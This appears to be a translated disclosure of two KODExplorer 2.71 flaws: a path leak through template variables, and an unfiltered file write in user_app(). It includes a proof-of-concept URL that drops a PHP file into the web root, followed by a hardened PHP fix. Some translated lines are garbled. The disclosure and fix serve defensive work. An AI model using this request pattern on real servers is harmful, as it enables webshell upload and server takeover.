Mango cloud KODExplorer Information Leakage + arbitrary command execution getshell (1)
First, an information leak: the absolute path is exposed... I also read the files one by one.
In controller\app.class.php:
    public function index() {
        $this->display(TEMPLATE.'app/index.php');
    }
Tracing into the parent class Controller:
    protected function display($tpl_file){
        global $L,$LNG;
        //var_dump($this->values);exit();
        extract($this->values);
        require($this->tpl.$tpl_file);
    }
Look at the template it includes!
Find template/index.php:
    <script src="<?php echo STATIC_PATH;?>js/lib/seajs/sea.js"></script>
    <script type="text/javascript">
    var LNG = <?php echo json_encode($L);?>;
    var G = {
        is_root : <?php echo $GLOBALS['is_root'];?>,
        web_root : "<?php echo $GLOBALS['web_root'];?>",
        web_host : "<?php echo HOST;?>",
        static_path : "<?php echo STATIC_PATH;?>",
        basic_path : "<?php echo BASIC_PATH;?>",
        version : "<?php echo KOD_VERSION;?>"
    };
The fields in question:
    web_host : "<?php echo HOST;?>",
    static_path : "<?php echo STATIC_PATH;?>",
    basic_path : "<?php echo BASIC_PATH;?>",
    version : "<?php echo KOD_VERSION;?>"
Look at what a local install renders. Have you seen it?
    web_root : "E:/wwwroot/",
    web_host : "http://localhost/",
    static_path : "./static/",
    basic_path : "E:/wwwroot/www/",
    version : "2.71"
Now let's look at the getshell!
Distribute... Otherwise, you will be given more...
0x02 getshell
Look at your second method:
    public function user_app() {
        //phpinfo();
        //var_dump($this->in['path']);exit();
        $path = _DIR($this->in['path']);
        //echo $path."<br/>";
        if (isset($this->in['action']) && $this->in['action'] == 'add'){
            $path .= '.oexe';
        }
        $data = json_decode(rawurldecode($this->in['data']),true);
        unset($data['name']);unset($data['desc']);unset($data['group']);
        $res = file_put_contents($path, json_encode($data));
        show_json($this->L['success']);
    }
I won't explain here where $path comes from. The vendor knows it... Let me pull out the relevant part; it's more convenient.
    $data = json_decode(rawurldecode($this->in['data']),true);
    unset($data['name']);unset($data['desc']);unset($data['group']);
    $res = file_put_contents($path, json_encode($data));
See?
$this->in['data'] is used directly?? Is there any filtering? It goes straight through rawurldecode, then json_decode, a few array keys are deleted, and the result is written to a file... Have you considered the pain of your user's chrysanthemum?
I will try to write a file for you...
http://localhost/www/index.php?app/user_app&path=fuck.php&data={"name":"1","desc":"2","group":"3","0":"<?php phpinfo();?>"}
I will not explain this one either... Vendor, you are so awesome, you know....
It is written directly into the root directory....
View
Solution:
Filter
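
One way to apply the "Filter" fix to the user_app() write shown above, as an added example (not KODExplorer's own code): the client supplies only a bare app name, the server fixes the directory and the .oexe extension, and only allow-listed keys are written. The function name safe_user_app_write, the ALLOWED_KEYS list and the temp directory are assumptions for illustration.

```php
<?php
// Added example: hardened take on the user_app() write path. Not KODExplorer code.
// ALLOWED_KEYS is an assumed .oexe schema; replace it with the real field list.
const ALLOWED_KEYS = ['type', 'content', 'icon', 'width', 'height'];

function safe_user_app_write(string $appDir, string $name, string $rawData): string
{
    // 1. The client supplies a bare app name; the server owns directory and extension.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $name)) {
        throw new InvalidArgumentException('invalid app name');
    }
    $base = realpath($appDir);
    if ($base === false || !is_dir($base)) {
        throw new RuntimeException('app directory missing');
    }
    $target = $base . DIRECTORY_SEPARATOR . $name . '.oexe';   // never .php

    // 2. Decode strictly and keep only known keys that hold scalar values.
    $data = json_decode(rawurldecode($rawData), true);
    if (!is_array($data)) {
        throw new InvalidArgumentException('data is not a JSON object');
    }
    $clean = [];
    foreach (ALLOWED_KEYS as $key) {
        if (isset($data[$key]) && is_scalar($data[$key])) {
            $clean[$key] = (string) $data[$key];
        }
    }
    // 3. Hex-escape <, >, &, ' and " so no "<?" sequence ever reaches the disk.
    $json = json_encode($clean, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    if ($json === false || file_put_contents($target, $json, LOCK_EX) === false) {
        throw new RuntimeException('write failed');
    }
    return $target;
}

// Constructed demo: a temp directory stands in for the app data directory.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'oexe_demo';
@mkdir($dir);
$payload = rawurlencode('{"name":"1","0":"<?php phpinfo();?>","type":"url","content":"<?x"}');
try {
    safe_user_app_write($dir, 'fuck.php', $payload);   // file name from the request above
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
$file = safe_user_app_write($dir, 'demo_app', $payload);
echo basename($file), " => ", file_get_contents($file), "\n";
```

Even with every check in place, the directory that receives these files should be one the web server never hands to the PHP interpreter.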